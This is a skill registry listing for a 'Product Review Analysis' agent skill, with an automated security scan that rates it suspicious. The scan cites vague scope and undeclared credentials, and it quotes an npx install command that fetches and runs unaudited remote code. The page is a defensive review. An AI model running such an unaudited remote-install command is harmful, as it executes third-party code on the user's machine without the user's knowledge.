Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Product Review Analysis
v1.0.0Analyze product reviews across any e-commerce platform. Extract actionable insights from customer feedback including pain points, praise patterns, feature re...
⭐ 0· 57·0 current·0 all-time
bynexscope-ai@nexscope
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The skill claims a 'multi-platform review aggregation framework' (Amazon, Etsy, Shopify, etc.) but the registry lists no required environment variables, no API keys, and no code. It's unclear how the skill would legitimately collect reviews from those platforms without user-provided data or platform credentials. This mismatch between capability claims and requested access is a red flag.
Instruction Scope
SKILL.md limits runtime behavior to collecting context from the user's message and asking one follow-up question, then 'research and analyze using the frameworks and methodology below' — but the methodological details are absent. The instructions are vague and could lead the agent to use broad external research or web scraping unless constrained. The file does not instruct reading local files or environment variables, which is good, but its ambiguity gives the agent wide discretion.
Install Mechanism
Although the registry contains no install spec and no code files, SKILL.md includes an 'Install' command using npx: 'npx skills add nexscope-ai/eCommerce-Skills --skill product-review-analysis -g'. That suggests the real functionality may come from an external package fetched and executed at install time. Running npx pulls remote code that will execute locally; the registry should instead declare that dependency. The lack of a formal install spec in the manifest combined with a recommended npx install is inconsistent and increases risk.
Credentials
For the stated capabilities (aggregating reviews across multiple e-commerce platforms), one would normally expect the skill to request platform API keys or explicit instructions to upload review data. The skill requests no environment variables or credentials, which is disproportionate to its claimed scope and leaves unclear whether the user must supply sensitive account credentials or raw review exports manually.
Persistence & Privilege
The skill does not request persistent presence (always: false), does not declare config path access, and contains no code files in the registry. There is no indication it will modify other skills or system-wide settings. Persistence/privilege level appears appropriate for an instruction-only skill.
What to consider before installing
This skill claims to aggregate reviews from multiple platforms but the manifest provides no code or credentials and only suggests running an external 'npx' command to install additional code. Before installing or running it: (1) Inspect the referenced repo/package (nexscope-ai/eCommerce-Skills) on GitHub/npm to review code and permissions; (2) don't run npx commands you haven't audited — npx executes remote code; (3) ask the developer how the skill fetches platform data and whether you'll need to provide API keys or upload your reviews manually; (4) if you must share reviews, prefer uploading exports rather than supplying account credentials; (5) if you want safe behavior, request that the skill be updated to declare its install spec and any required env vars explicitly in the registry.Like a lobster shell, security has layers — review code before you run it.
latestvk97fzf3pbc8e842fs7jygb9ffh83nfz2
License
MIT-0
Free to use, modify, and redistribute. No attribution required.